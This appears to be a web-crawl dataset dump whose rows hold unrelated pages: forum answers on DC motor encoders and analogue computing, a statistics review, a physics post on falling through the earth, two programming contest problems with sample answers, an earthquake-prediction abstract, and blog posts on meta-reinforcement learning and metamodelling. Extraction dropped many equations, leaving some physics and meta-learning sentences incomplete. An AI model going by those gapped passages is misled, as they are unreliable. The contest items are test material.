text stringlengths 529 113k | id stringlengths 47 47 | dump stringclasses 1 value | url stringlengths 20 275 | file_path stringlengths 125 126 | language stringclasses 1 value | language_score float64 0.65 0.98 | token_count int64 122 25.3k | score float64 2.52 4.56 | int_score int64 3 5 |
|---|---|---|---|---|---|---|---|---|---|
My question is: what is the difference between DC motor with encoder and DC without encoder? As long as I can control the speed of DC motor using PWM, for example on the Arduino, what is the fundamental difference?
$\begingroup$ Fundamental difference in terms of what? Open loop control, closed loop control, price, construction, etc... $\endgroup$– Ben ♦Nov 25, 2016 at 14:37
As @szczepan mentions, the difference is one of feedback.
There are many ways to get feedback regarding the motion of a dc motor. People implementing a control system will often put a mark on the motor's shaft, or attach a "flag" of masking tape, so that they can visually see the turning of the shaft. This helps to ensure the direction of motion is correct (otherwise the dc polarity needs to be reversed). It also helps for observing motion at slow speeds - but is otherwise not appropriate for an automated system.
If you want to automate the observations of the motor's rotation, you must implement some type of sensor that provides appropriate information to the control computer. There are many ways to do this. For example, you can monitor the current being consumed by the motor's windings, and use the motor constant $k_\tau$, to infer the torque generated by the motor. This can be related to acceleration of the shaft by using an appropriate dynamic model of the system. This method, however, is not very accurate and is prone to modelling errors and signal noise. This method is similar to you monitoring the PWM output and inferring motion dynamics - neither is robust to changing dynamics of the system. Another approach is to glue a magnet to the shaft, and monitor it with a Hall effect sensor. This will provide a single pulse to the computer for each rotation of the shaft. This is frequently a solution for high-temperature, or dirty, environments (such as in automotive applications). However, often you need finer granularity of the motion. That is where encoders come in.
There are two basic types of encoders: incremental and absolute. They can be further characterized as quadrature, or non-quadrature encoders. A non-quadrature incremental encoder provides a single pulse to the controller for every incremental motion of the motor shaft. As the previous answer makes clear, this position feedback can be interpreted to infer velocity, acceleration, and possibly jerk (although three derivatives of a sensed value are "spikey" in most applications). This type of encoder, however, only provides information when the position changes, and it does not provide any information about the direction of motion. A quadrature encoder provides two pulses, out of phase, that can be used to detect direction also.
An absolute encoder can provide not only the same information as the incremental encoder does, but it also has many more bits of information from which you can know the angular position of the shaft, in addition to detecting the incremental changes in position.
You can make a very simple encoder by using a disc with slots cut into it. Place a photodiode on one side of the disc, and a photodetector on the opposite side. You will get one pulse each time a slot passes between the sensor elements. As you can see, the accuracy of motion detection is determined by the number of slots in the disc. Encoders are available with many different numbers of pulses per revolution.
I suggest reading a book such as this one if you want to know more about motion metrology:
Fundamental difference is closed loop feedback. Without encoder you just know how much speed you sent to engine, but have no information about speed that is on it - lower battery voltage will decrease your speed. Encoder gives you ability to measure engine
speed position, from which you can calculate speed, and regulate those parameters, for example with PID regulator. Usage example can be micromouse robots, where odometry is crucial in moving through maze.
$\begingroup$ The encoder gives you angular position and speed can be calculated from this. $\endgroup$– 50k4Nov 24, 2016 at 8:56
$\begingroup$ @50k4 Not every encoder gives angular position. AS5040 can measure angular position and speed, while this kind of encoder gives only quadrature output (A and B channel) and measuring impulse count in certain time gives angular velocity. $\endgroup$– SzczepanNov 24, 2016 at 8:59
$\begingroup$ The link you have provided clearly states (in the title) that is it a rotary position sensor. Every other output (e.g. speed) is computed not measured. $\endgroup$– 50k4Nov 24, 2016 at 9:51
$\begingroup$ Okay, I'll update my answer as soon as I get home. As You said, AS5040 is rotary position sensor. $\endgroup$– SzczepanNov 24, 2016 at 12:48
$\begingroup$ Encoders are not the only way of closing the loop, for example you can sense changes in back emf (certain model railway controllers do this for DC motors, most 'sensorless' BLDC controllers do this). $\endgroup$ Jul 27, 2017 at 12:07 | <urn:uuid:7a028f3e-5ddc-4341-883a-08ba831d6ee7> | CC-MAIN-2023-14 | https://robotics.stackexchange.com/questions/11108/what-is-the-difference-between-dc-motor-with-encoder-and-dc-with-out-encoder/11109 | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943704.21/warc/CC-MAIN-20230321162614-20230321192614-00000.warc.gz | en | 0.913547 | 1,134 | 3.03125 | 3 |
9.10: Chapter Review
- Page ID
9.1 Null and Alternative Hypotheses
In a hypothesis test, sample data is evaluated in order to arrive at a decision about some type of claim. If certain conditions about the sample are satisfied, then the claim can be evaluated for a population. In a hypothesis test, we:
- Evaluate the null hypothesis, typically denoted with H0. The null is not rejected unless the hypothesis test shows otherwise. The null statement must always contain some form of equality (=, ≤ or ≥)
- Always write the alternative hypothesis, typically denoted with \(H_a\) or \(H_1\), using not equal, less than or greater than symbols, i.e., (\(neq\), <, or > ).
- If we reject the null hypothesis, then we can assume there is enough evidence to support the alternative hypothesis.
- Never state that a claim is proven true or false. Keep in mind the underlying fact that hypothesis testing is based on probability laws; therefore, we can talk only in terms of non-absolute certainties.
9.2 Outcomes and the Type I and Type II Errors
In every hypothesis test, the outcomes are dependent on a correct interpretation of the data. Incorrect calculations or misunderstood summary statistics can yield errors that affect the results. A Type I error occurs when a true null hypothesis is rejected. A Type II error occurs when a false null hypothesis is not rejected.
The probabilities of these errors are denoted by the Greek letters \(\alpha\) and \(\beta\), for a Type I and a Type II error respectively. The power of the test, \(1 – \beta\), quantifies the likelihood that a test will yield the correct result of a true alternative hypothesis being accepted. A high power is desirable.
9.3 Distribution Needed for Hypothesis Testing
In order for a hypothesis test’s results to be generalized to a population, certain requirements must be satisfied.
When testing for a single population mean:
- A Student's \(t\)-test should be used if the data come from a simple, random sample and the population is approximately normally distributed, or the sample size is large, with an unknown standard deviation.
- The normal test will work if the data come from a simple, random sample and the population is approximately normally distributed, or the sample size is large.
When testing a single population proportion use a normal test for a single population proportion if the data comes from a simple, random sample, fill the requirements for a binomial distribution, and the mean number of successes and the mean number of failures satisfy the conditions: \(np > 5\) and \(nq > 5\) where \(n\) is the sample size, \(p\) is the probability of a success, and \(q\) is the probability of a failure.
9.4 Full Hypothesis Test Examples
The hypothesis test itself has an established process. This can be summarized as follows:
- Determine \(H_0\) and \(H_a\). Remember, they are contradictory.
- Determine the random variable.
- Determine the distribution for the test.
- Draw a graph and calculate the test statistic.
- Compare the calculated test statistic with the \(Z\) critical value determined by the level of significance required by the test and make a decision (cannot reject \(H_0\) or cannot accept \(H_0\)), and write a clear conclusion using English sentences. | <urn:uuid:a52c0134-060a-4b5d-b2c7-605f366d8377> | CC-MAIN-2023-14 | https://stats.libretexts.org/Bookshelves/Applied_Statistics/Introductory_Business_Statistics_(OpenStax)/09%3A_Hypothesis_Testing_with_One_Sample/9.10%3A_Chapter_Review | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945376.29/warc/CC-MAIN-20230325222822-20230326012822-00400.warc.gz | en | 0.869652 | 727 | 4.21875 | 4 |
It’s been way too long since my last posting. A combination of wanting to do some additional research to support the post I was working on, and real life interfering,
So in the meantime I thought I’d do a quick post on a question that pops up here and there on the internet as it’s a fun little calculation: What happens (theoretically) if you fall into a hole that goes all the way through the earth?
As usual in introductory physics problems, we make some simplifying assumptions and ignore some practicalities. We’re not going to worry about the heat that would fry you as you descend to the core, we’re not going to worry about the fact that you would smash into the sides of the hole due to the rotation of the earth, and we’re definitely not going to worry about the fact that the earth is not technically a sphere.
Our idealized earth is non-rotating, a perfect sphere, and has the same density throughout. And doesn’t have any of that pesky volcanic
The calculation is pretty simple once you lay the groundwork on two concepts: Simple Harmonic Motion and Gauss’s Law.
Simple Harmonic Motion
Suppose you have a quantity which obeys the following differential equation:
The general solution to this equation is known to be a sine wave, where and are arbitrary constants. Plugging this back into the differential equation:
oscillates sinusoidally with time. Any motion that has this sinusoidal behavior is called simple harmonic motion. If we define then is the frequency of the oscillation. For any wave, the period is the reciprocal of . From this we can conclude that if we have a variable which obeys a differential equation of the form , then will be simple harmonic motion with period .
The constants and are the amplitude and phase, respectively, of the sine wave. The fact that the equation is satisfied no matter what the values of those constants means that the system can have any amplitude and phase.
Example: Mass on a spring
The standard model of a mass on a spring is that there is a constant called the spring constant, such that if you displace the spring by an amount from its equilibrium position, the spring pulls back with a force . The negative sign indicates that the force is opposite to the displacement. If you pull the spring down, the force pulls up and vice versa.
That force acts on the mass to accelerate it . And so we see that the mass on the spring follows the equation:
and we can see immediately that this motion meets the conditions for simple harmonic motion with , and its period is therefore
If you swing a pendulum out of its equilibrium position by an angle , gravity will tend to pull it back down. The component of gravity pulling outward on the string has no effect as we assume the pendulum isn’t free to move in that direction. The component of gravitational force which is perpendicular to the string is $-mg \sin \theta$.
If we set this equal to as usual, the in that equation refers to distance along the arc, where is the length of the pendulum. So we have the equation
Because of the sine, this doesn’t at first glance look like it meets the conditions for simple harmonic motion. But for small angles, with in radians. What does “small” mean? As with any approximation in physics, there’s no firm definition. It depends on what level of accuracy you need. The smaller the angle, the better the approximation. For introductory physics calculations, is often taken as a rule of thumb for “small enough”. is about radians, and , an error of about .
If we use the small angle approximation then the equation of motion becomes
and now we see that does (approximately) follow simple harmonic motion, with period .
The mathematician Carl Friedrich Gauss discovered a very powerful theorem that simplifies many otherwise very difficult calculations. There is a form for the electrostatic force and for the gravitational force, and it arises from certain mathematical properties these two forces share, most especially that they are both inverse square-law forces, proportional to .
The general form for the electric field is this somewhat intimidating notation:
This relates an integral of the electric field over a closed surface , to the total charge enclosed inside that surface. It doesn’t matter what charge is outside, only inside. The constant comes from the electric field of a point charge, .
The analogous result for gravitational fields, where we define the gravitational field of a point mass to be is
where M is the total mass enclosed by the surface S. The minus sign expresses the fact that the gravitational field of a mass points inward (masses attract) while the direction of electric field from a positive charge is outward.
Note that “electric field” is defined as “force per unit charge”, while “gravitational field” is analogously defined as “force per unit mass”. But because , then “force per unit mass” is simply acceleration.
Gravity Inside the Earth
We don’t need to do a complete exploration of Gauss’s Law, we only need to cover the case of a uniform sphere, our model of the earth. To calculate the gravitational field at distance from the center of the earth, we take as the surface S the sphere of radius . The field will be the same at every point on the surface of this sphere, which means the left hand side of Gauss’ Law reduces to the field times the area of the sphere: .
On the right hand side we have the mass enclosed inside the radius . We’ll call this . So
The gravitational field at radius looks like the gravitational field of a point whose mass is , all the mass enclosed by the sphere of radius .
How much mass is that? We are assuming a constant density for the earth, so is times the volume of the sphere, . Thus
Everything on the right besides is a constant. So this says that the gravitational field at distance from the center is proportional to .
Jumping Into the Hole
As we noted above, the gravitational field is simply the acceleration, . So the equation above says that is a negative constant times , which we know means that will follow simple harmonic motion.
We’re almost done, but it will be convenient to put it in terms of different constants. The average density of the earth is equal to total mass over total volume. Using for the total mass of the earth and for the radius,
We know that this describes simple harmonic motion, and from the previous analysis we can immediately conclude that the period is Using values of , (the polar radius, as I think we should drill the hole pole-to-pole to avoid the rotation), and this gives seconds, which means the one way trip is 2522 seconds or almost exactly 42 minutes.
Fans of Douglas Adams (Hitchhiker’s Guide to the Galaxy) will appreciate the cosmic significance of the number 42.
Conclusion: Ignoring rotation, air drag, and the minor annoyance of core temperatures, if you jump into a hole that goes straight through the earth, you will oscillate from one end of the hole to the other forever, taking 42 minutes to go from one end to the other.
Leave a Reply | <urn:uuid:a35cb8e5-1c00-43cc-8027-99719dadc057> | CC-MAIN-2023-14 | https://terra-phy.com/2022/08/30/drilling-a-hole-through-the-earth/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296948620.60/warc/CC-MAIN-20230327092225-20230327122225-00600.warc.gz | en | 0.921016 | 1,540 | 3.046875 | 3 |
TL;DR: If by “analogue computers”, you mean differential analysers, the answer is adders, constant units and integrator. Bournez, Campagnolo, Graça and Hainry have shown in 2006 (paywalled / free reprint) that an idealized model of it allows to compute all the computable functions in the framework of computable analysis, and this model only needs these 3 kind of units.
The set of operation you propose (addition, multiplication, subtraction, and division), even completed by root equation is by definition not sufficient to compute any transcendental function. Transcendental functions includes very common functions, like $\sin$, $\exp$, $\log$. However, as discussed below, some analogue computer model allow to compute transcendental functions and, basically all real functions computable by a Turing machine.
Analogue computing models
As stressed by others, the concept of “universal computation” is less clear for analogue computers than for standard computer, where different natural notion of computability in different computing models where found equivalent in the 1930’s (see Wikipedia page on Church Turing Thesis for details).
In order to define such a universality, one should first define a good model for analogue computation, and it is a difficult task, since the model should be idealized and and natural enough to be useful, but its idealization should not give unrealistic power to the model. An example of such a good idealization is the infinite tape of Turing machines. The problem with analogue computers comes with real numbers which could allow to build unreasonable stuff like the Zeno machine. However, several such models have been proposed and used in the literature (The GPAC is the main subject of this answer, but I try to be complete in the list below, without any hypercomputer):
Power of the GPAC model
In his 1941 paper, Shanon introduced the GPAC to model differential analysers.This model only needs 3 kinds of interconnected units (constant units, adders and integrators. Multipliers can be built from integrators and adders.)
He showed that the set of functions which it generates is the set of algebraic differential functions, but excludes the hypertranscendental functions. It means that the $\Gamma$ and $\zeta$, which are Turing-computable cannot be generated. In other words, no differential analyser will ever have an output $y(t)=\Gamma(t)$, ant it seemed for a long time that such an analogue computer is not “universal”, since it cannot generate some reasonable computable functions, used by mathematicians.
However, in 2004, Daniel Silva Graça showed that the previous model, based on instantaneous computation is too restrictive. If one define the computability of a function $f$ differently, allowing $y(t)$ to converge towards $f(x)$, for an input $x$, then the $\gamma$ and $\zeta$ functions are computable by a GPAC. Bournez, Campagnolo, Graça and Hainry then showed in 2006 (paywalled / free reprint) that an idealized model of it allows to compute all the computable functions in the framework of computable analysis.
Bournez, Graça and Pouly then showed in 2013 that these analogue computers can efficiently simulate a Turing machine (p.181 of a big pdf) and, in 2014, that the P and NP complexity classes are equivalent in this model. | <urn:uuid:4b37137b-2e55-4330-984c-b0b4ccba51e7> | CC-MAIN-2023-14 | https://cs.stackexchange.com/questions/1292/what-is-required-for-universal-analogue-computation | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943589.10/warc/CC-MAIN-20230321002050-20230321032050-00000.warc.gz | en | 0.909528 | 731 | 2.578125 | 3 |
The island municipality of Soteholm is required to write a plan of action for their work with emission of greenhouse gases. They realize that a natural first step is to decide whether they are for or against global warming. For this purpose they have read the IPCC report on climate change and found out that the largest effect on their municipality could be the rising sea level.
The residents of Soteholm value their coast highly and therefore want to maximize its total length. For them to be able to make an informed decision on their position in the issue of global warming, you have to help them find out whether their coastal line will shrink or expand if the sea level rises. From height maps they have figured out what parts of their islands will be covered by water, under the different scenarios described in the IPCC report, but they need your help to calculate the length of the coastal lines.
You will be given a map of Soteholm as an $N\times M$ grid. Each square in the grid has a side length of 1 km and is either water or land. Your goal is to compute the total length of sea coast of all islands. Sea coast is all borders between land and sea, and sea is any water connected to an edge of the map only through water. Two squares are connected if they share an edge. You may assume that the map is surrounded by sea. Lakes and islands in lakes are not contributing to the sea coast.
The first line of the input contains two space separated integers $N$ and $M$ where $1\leq N,M\leq 1000$. The following $N$ lines each contain a string of length $M$ consisting of only zeros and ones. Zero means water and one means land.
Output one line with one integer, the total length of the coast in km.
|Sample Input 1||Sample Output 1|
5 6 011110 010110 111000 000010 000000 | <urn:uuid:289cbcac-5832-4ec1-97a2-0157c3b7c1fa> | CC-MAIN-2023-14 | https://ru.kattis.com/courses/T-414-AFLV/aflv21/assignments/hd5o83/problems/coast | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296943625.81/warc/CC-MAIN-20230321033306-20230321063306-00200.warc.gz | en | 0.936491 | 418 | 3.984375 | 4 |
By Anusha Nagabandi and Ignasi Clavera
Humans have the ability to seamlessly adapt to changes in their environments: adults can learn to walk on crutches in just a few seconds, people can adapt almost instantaneously to picking up an object that is unexpectedly heavy, and children who can walk on flat ground can quickly adapt their gait to walk uphill without having to relearn how to walk. This adaptation is critical for functioning in the real world.
Robots, on the other hand, are typically deployed with a fixed behavior (be it hard-coded or learned), allowing them succeed in specific settings, but leading to failure in others: experiencing a system malfunction, encountering a new terrain or environment changes such as wind, or needing to cope with a payload or other unexpected perturbations. The idea behind our latest research is that the mismatch between predicted and observed recent states should inform the robot to update its model into one that more accurately describes the current situation. Noticing our car skidding on the road, for example, informs us that our actions are having a different effect than expected, and thus allows us to plan our consequent actions accordingly (Fig. 2). In order for our robots to be successful in the real world, it is critical that they have this ability to use their past experience to quickly and flexibly adapt. To this effect, we developed a model-based meta-reinforcement learning algorithm capable of fast adaptation.
Figure 2: The driver normally makes decisions based on his/her model of the world. Suddenly encountering a slippery road, however, leads to unexpected skidding. Online adaptation of the driver’s world model based on just a few of these observations of model mismatch allows for fast recovery.
Prior work has used (a) trial-and-error adaptation approaches (Cully et al., 2015) as well as (b) model-free meta-RL approaches (Wang et al., 2016; Finn et al., 2017) to enable agents to adapt after a handful of trials. However, our work takes this adaptation ability to the extreme. Rather than adaptation requiring a few episodes of experience under the new settings, our adaptation happens online on the scale of just a few timesteps (i.e., milliseconds): so fast that it can hardly be noticed.
We achieve this fast adaptation through the use of meta-learning (discussed below) in a model-based learning setup. In the model-based setting, rather than adapting based on the rewards that are achieved during rollouts, data for updating the model is readily available at every timestep in the form of model prediction errors on recent experiences. This model-based approach enables the robot to meaningfully update the model using only a small amount of recent data.
Fig 3. The agent uses recent experience to fine-tune the prior model into an adapted one, which the planner then uses to perform its action selection. Note that we omit details of the update rule in this post, but we experiment with two such options in our work.
Our method follows the general formulation shown in Fig. 3 of using observations from recent data to perform adaptation of a model, and it is analogous to the overall framework of adaptive control (Sastry and Isidori, 1989; Åström and Wittenmark, 2013). The real challenge here, however, is how to successfully enable model adaptation when the models are complex, nonlinear, high-capacity function approximators (i.e., neural networks). Naively implementing SGD on the model weights is not effective, as neural networks require much larger amounts of data in order to perform meaningful learning.
Thus, we enable fast adaptation at test time by explicitly training with this adaptation objective during (meta-)training time, as explained in the following section. Once we meta-train across data from various settings in order to get this prior model (with weights denoted as ) that is good at adaptation, the robot can then adapt from this at each time step (Fig. 3) by using this prior in conjunction with recent experience to fine-tune its model to the current setting at hand, thus allowing for fast online adaptation.
At any given time step , we are in state , we take action , and we end up in some resulting state according to the underlying dynamics function . The true dynamics are unknown to us, so we instead want to fit some learned dynamics model that makes predictions as well as possible on observed data points of the form . Our planner can use this estimated dynamics model in order to perform action selection.
Assuming that any detail or setting could have changed at any time step along the rollout, we consider temporally-close time steps as being able to inform us about the “task” details of our current situation: operating in different parts of the state space, enduring disturbances, attempting new goals/reward, experiencing a system malfunction, etc. Thus, in order for our model to be the most useful for planning, we want to first update it using our recently observed data.
At training time (Fig. 4), what this amounts to is selecting a consecutive sequence of (M+K) data points, using the first M to update our model weights from to , and then optimizing for this new to be good at predicting the state transitions for the next K time steps. This newly formulated loss function represents prediction error on the future K points, after adapting the weights using information from the past K points:
In other words, does not need to result in good dynamics predictions. Instead, needs to be such that it can use task-specific (i.e. recent) data points to quickly adapt itself into new weights that do result in good dynamics predictions. See the MAML blog post for more intuition on this formulation.
Fig 4. Meta-training procedure for obtaining a $\theta$ such that the adaptation of $\theta$ using the past $M$ timesteps of experience produces a model that performs well for the future $K$ timesteps.
We conducted experiments on simulated robotic systems to test the ability of our method to adapt to sudden changes in the environment, as well as to generalize beyond the training environments. Note that we meta-trained all agents on some distribution of tasks/environments (see paper for details), but we then evaluated their adaptation ability on unseen and changing environments at test time. Figure 5 shows a cheetah robot that was trained on piers of varying random buoyancy, and then tested on a pier with sections of varying buoyancy in the water. This environment demonstrates the need for not only adaptation, but for fast/online adaptation. Figure 6 also demonstrates the need for online adaptation by showing an ant robot that was trained with different crippled legs, but tested on an unseen leg failure occurring part-way through a rollout. In these qualitative results below, we compare our gradient-based adaptive learner (‘GrBAL’) to a standard model-based learner (‘MB’) that was trained on the same variation of training tasks but has no explicit mechanism for adaptation.
Fig 5. Cheetah: Both methods are trained on piers of varying buoyancy. Ours is able to perform fast online adaptation at run-time to cope with changing buoyancy over the course of a new pier.
Fig 6. Ant: Both methods are trained on different joints being crippled. Ours is able to use its recent experiences to adapt its knowledge and cope with an unexpected and new malfunction in the form of a crippled leg (for a leg that was never seen as crippled during training).
The fast adaptation capabilities of this model-based meta-RL method allow our simulated robotic systems to attain substantial improvement in performance and/or sample efficiency over prior state-of-the-art methods, as well as over ablations of this method with the choice of yes/no online adaptation, yes/no meta-training, and yes/no dynamics model. Please refer to our paper for these quantitative comparisons.
Fig 7. Our real dynamic legged millirobot, on which we successfully employ our model-based meta-reinforcement learning algorithm to enable online adaptation to disturbances and new settings such as traversing a slippery slope, accommodating payloads, accounting for pose miscalibration errors, and adjusting to a missing leg.
To highlight not only the sample efficiency of our meta reinforcement learning approach, but also the importance of fast online adaptation in the real world, we demonstrate our approach on a real dynamic legged millirobot (see Fig 7). This small 6-legged robot presents a modeling and control challenge in the form of highly stochastic and dynamic movement. This robot is an excellent candidate for online adaptation for many reasons: the rapid manufacturing techniques and numerous custom-design steps used to construct this robot make it impossible to reproduce the same dynamics each time, its linkages and other body parts deteriorate over time, and it moves very quickly and dynamically as a function of its terrain.
We meta-train this legged robot on various terrains, and we then test the agent’s learned ability to adapt online to new tasks (at run-time) including a missing leg, novel slippery terrains and slopes, miscalibration or errors in pose estimation, and new payloads to be pulled. Our hardware experiments compare our method to (a) standard model-based learning (‘MB’), with neither adaptation nor meta-learning, and well as (b) a dynamic evaluation (‘MB+DE’) comparison having adaptation, but performing the adaptation from a non-meta-learned prior. These results (Fig. 8-10) show the need for not only adaptation, but adaptation from an explicitly meta-learned prior.
Fig 8. Missing leg.
Fig 9. Payload.
Fig 10. Miscalibrated Pose.
By effectively adapting online, our method prevents drift from a missing leg, prevents sliding sideways down a slope, accounts for pose miscalibration errors, and adjusts to pulling payloads. Note that these tasks/environments share enough commonalities with the locomotion behaviors learned during the meta-training phase such that it would be useful to draw from that prior knowledge (rather than learn from scratch), but they are different enough that they do require effective online adaptation for success.
Fig 11. The ability to draw from prior knowledge as well as to learn from recent knowledge enables GrBAL (ours) to clearly outperform both MB and MB+DE when tested on environments that (1) require online adaptation and/or (2) were never seen during training.
This work enables online adaptation of high-capacity neural network dynamics models, through the use of meta-learning. By allowing local fine-tuning of a model starting from a meta-learned prior, we preclude the need for an accurate global model, as well as allow for fast adaptation to new situations such as unexpected environmental changes. Although we showed results of adaptation on various tasks in both simulation and hardware, there remain numerous relevant avenues for improvement.
First, although this setup of always fine-tuning from our pre-trained prior can be powerful, one limitation of this approach is that even numerous times of seeing a new setting would result in the same performance as the 1st time of seeing it. In this follow-up work, we take steps to address precisely this issue of improving over time, while simultaneously not forgetting older skills as a consequence of experiencing new ones.
Another area for improvement includes formulating conditions or an analysis of the capabilities and limitations of this adaptation: what can or cannot be adapted to, given the knowledge contained in the prior? For example, consider two humans learning to ride a bicycle who suddenly experience a slippery road. Assume that neither of them have ridden a bike before, so they have never fallen off a bike before. Human A might fall, break their wrist, and require months of physical therapy. Human B, on the other hand, might draw from his/her prior knowledge of martial arts and thus implement a good “falling” procedure (i.e., roll onto your back instead of trying to break a fall with the wrist). This is a case when both humans are trying to execute a new task, but other experiences from their prior knowledge significantly affect the result of their adaptation attempt. Thus, having some mechanism for understanding limitations of adaptation, under the existing prior, would be interesting.
We would like to thank Sergey Levine and Chelsea Finn for their feedback during the preparation of this blog post. We would also like to thank our co-authors Simin Liu, Ronald Fearing, and Pieter Abbeel. This post is based on the following paper:
- Learning to Adapt in Dynamic, Real-World Environments Through Meta-Reinforcement Learning
A Nagabandi*, I Clavera*, S Liu, R Fearing, P Abbeel, S Levine, C Finn
International Conference on Learning Representations (ICLR) 2019
Arxiv, Code, Project Page
This article was initially published on the BAIR blog, and appears here with the authors’ permission. | <urn:uuid:39a8ca22-1e43-4288-ae06-b9825fb21d43> | CC-MAIN-2023-14 | https://robotics.ee/2019/05/13/robots-that-learn-to-adapt/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945315.31/warc/CC-MAIN-20230325033306-20230325063306-00200.warc.gz | en | 0.939574 | 2,728 | 3.265625 | 3 |
Game of Throwns
Daenerys frequently invents games to help teach her second grade Computer Science class about various aspects of the discipline. For this week’s lesson she has the children form a circle and (carefully) throw around a petrified dragon egg.
The $n$ children are numbered from $0$ to $n - 1$ (it is a Computer Science class after all) clockwise around the circle. Child $0$ always starts with the egg. Daenerys will call out one of two things:
a number $t$, indicating that the egg is to be thrown to the child who is $t$ positions clockwise from the current egg holder, wrapping around if necessary. If $t$ is negative, then the throw is to the counter-clockwise direction.
the phrase undo $m$, indicating that the last $m$ throws should be undone. Note that undo commands never undo other undo commands; they just undo commands described in item $1$ above.
For example, if there are $5$ children, and the teacher calls out the four throw commands 8 -2 3 undo 2, the throws will start from child $0$ to child $3$, then from child $3$ to child $1$, then from child $1$ to child $4$. After this, the undo 2 instructions will result in the egg being thrown back from child $4$ to child $1$ and then from child $1$ back to child $3$. If Daenerys calls out $0$ (or $n, -n, 2n, -2n$, etc.) then the child with the egg simply throws it straight up in the air and (carefully) catches it again.
Daenerys would like a little program that determines where the egg should end up if her commands are executed correctly. Don’t ask what happens to the children if this isn’t the case.
Input consists of two lines. The first line contains two positive integers $n$ $k$ ($1\leq n \leq 30$, $1 \leq k \leq 100$) indicating the number of students and how many throw commands Daenerys calls out, respectively. The following line contains the $k$ throw commands. Each command is either an integer $p$ ($-10\, 000 \leq p \leq 10\, 000$) indicating how many positions to throw the egg clockwise or undo $m$ ($m \geq 1$) indicating that the last $m$ throws should be undone. Daenerys never has the kids undo beyond the start of the game.
Display the number of the child with the egg at the end of the game.
|Sample Input 1||Sample Output 1|
5 4 8 -2 3 undo 2
|Sample Input 2||Sample Output 2|
5 10 7 -3 undo 1 4 3 -9 5 undo 2 undo 1 6 | <urn:uuid:923dd795-d672-4a6d-bcc0-f19dc6926003> | CC-MAIN-2023-14 | https://nus.kattis.com/courses/IT5003/IT5003_S2_AY2223/assignments/pe7tbg/problems/throwns | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296944452.74/warc/CC-MAIN-20230322180852-20230322210852-00600.warc.gz | en | 0.915059 | 646 | 3.390625 | 3 |
نوع مقاله : پژوهشی
1 بخش مهندسی صنایع، دانشگاه تربیت مدرس
2 پژوهشگاه بین المللی زلزله شناسی و مهندسی زلزله
عنوان مقاله [English]
Iran is known as one of the high risk seismic regions of the world. Over the past 50 years, many destructive earthquakes have occurred in this area, causing much human loss and financial damage. So, from the perspective of emergency-management and hazard preparedness, it is essential to make an effort to predict earthquake occurrence. Earthquake prediction is an instance of
interdisciplinary research, which is a concern of many scientists in various fields, such as geology, seismology, engineering, mathematics, computer science and even social sciences, who study different aspects of the matter to find new solutions. Efforts in this field are divided into long-term and short-term predictions. The short-term predictions are based on precursors such as foreshock, seismic quiescence, decrease in radon concentrations and other geochemical phenomenon. Due to numerous complexities and unknown factors inside the earth, exact prediction of earthquakes is difficult and practically impossible. During the last two decades, many techniques have been developed to discover the pattern of seismic data and predict three earthquake parameters, namely; time of occurrence, location and magnitude of future earthquakes. Soft computing and data mining techniques, such as neural networks, fuzzy logic and clustering methods are appropriate tools for problems, such as earthquake
prediction, that suffer from inherent complexities. Many researchers have used these approaches to reduce uncertainty in results.
In this paper, the b-value of the Gutenberg Richter law has been considered as a precursor to earthquake prediction. Prior to earthquakes equal to or greater than $M_w$ = 6.0, temporal variation of the b-value has been examined in Qeshm island and neighboring areas in the south of Iran, from 1995 to 2012. The clustering method, by the k-means algorithm, and a self-organizing map (SOM) have been undertaken to find a pattern of variation of the b-value. Three clusters are obtained as an optimum number of clusters by the Silhouette Index and the Davis-Bouldin index. Prior to all the mentioned earthquakes $(M_w\geq 6.0)$ a cluster, known as a decrease in b-value, has been seen; so, a decrease in the b-value before main shocks has been considered as a distinctive pattern. Also, an approximate time of decrease has been determined. | <urn:uuid:7accd3ff-6c23-4341-8b71-b5638ea3eff2> | CC-MAIN-2023-14 | http://sjce.journals.sharif.edu/article_1014.html | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945242.64/warc/CC-MAIN-20230324020038-20230324050038-00600.warc.gz | en | 0.914645 | 674 | 3.078125 | 3 |
Multivariate metamodelling is a way to make simplified models of mechanistic models that can be run faster and are more interpretable. This opens up a set of possibilities for how to use already existing mechanistic models to optimize processes and improve understanding.
Our Multivariate Metamodelling methods allow our customers to:
Mechanistic, or theory driven models, are widely used to describe behavior of a system based on known theory. These mathematical models could be for furnaces in the metallurgy industry, wind turbines, spread of infectious diseases, or the cardiovascular system. Examples: Finite element models of heat diffusion or electrical fields, differential equations of reaction kinetics, or computational fluid dynamic models of turbulence in gases or liquids.
A good mechanistic model describes essential properties and behaviors, according to the laws of physics within the selected process design. Such a model is a valuable source of prior knowledge, especially about how the system will behave under conditions where you don’t even WANT to have observational data, for example situations that cause harm to equipment or personnel.
Mechanistic mathematical models often encapsulate deep prior knowledge of domain experts. However, mechanistic models may be slightly oversimplified – they often do not take all possible interactions between the parameters into account. Still, they do describe valuable insight about how the laws of physics determine the input-output relationships of the system, and how the system was intended to function.
One other issue is that many of the coefficients that are built into the mechanistic/first principle models are estimated from certain experiments that might not have a general applicability, but represent a “best estimate”. This might introduce some bias in the models, so that they cannot be extrapolated uncritically to other similar but not identical applications.
Mechanistic models are often used for design of processes and assets. But today, they are seldom used in the operations phase. One reason is that they are often slow to compute and difficult to fit to streams of process measurements. Another reason is that a model is no longer trusted – maybe there were discrepancies between the planned “design” in the model and what was actually “built”, or perhaps the model has not been updated with later furnace modernizations. Raw materials and operating conditions also change over time, reducing fit with the original mechanistic model.
So, theory-driven mechanistic models might not be perfect. But they can be supplemented by data-driven models based on actual process measurements. This is called “hybrid modelling”, and combine mechanistic- and data driven modelling, using the advantage of each and avoiding the disadvantage of each.
A multivariate metamodel is a simplified description of the output behavior of a mechanistic model under different input conditions. When building a metamodel, we need to describe the mechanistic model’s behavior. This means running the mechanistic model repeatedly under different conditions, making sure that the relevant range of conditions are included.
The model inputs (various combinations of relevant system design descriptions, parameter values, initial conditions and computational controls), are chosen so that the model outputs will be is representative for the use case of interest as well as for unwanted, but possible deviations from these. This set of computer simulations with the mechanistic model needs only to be done only once.
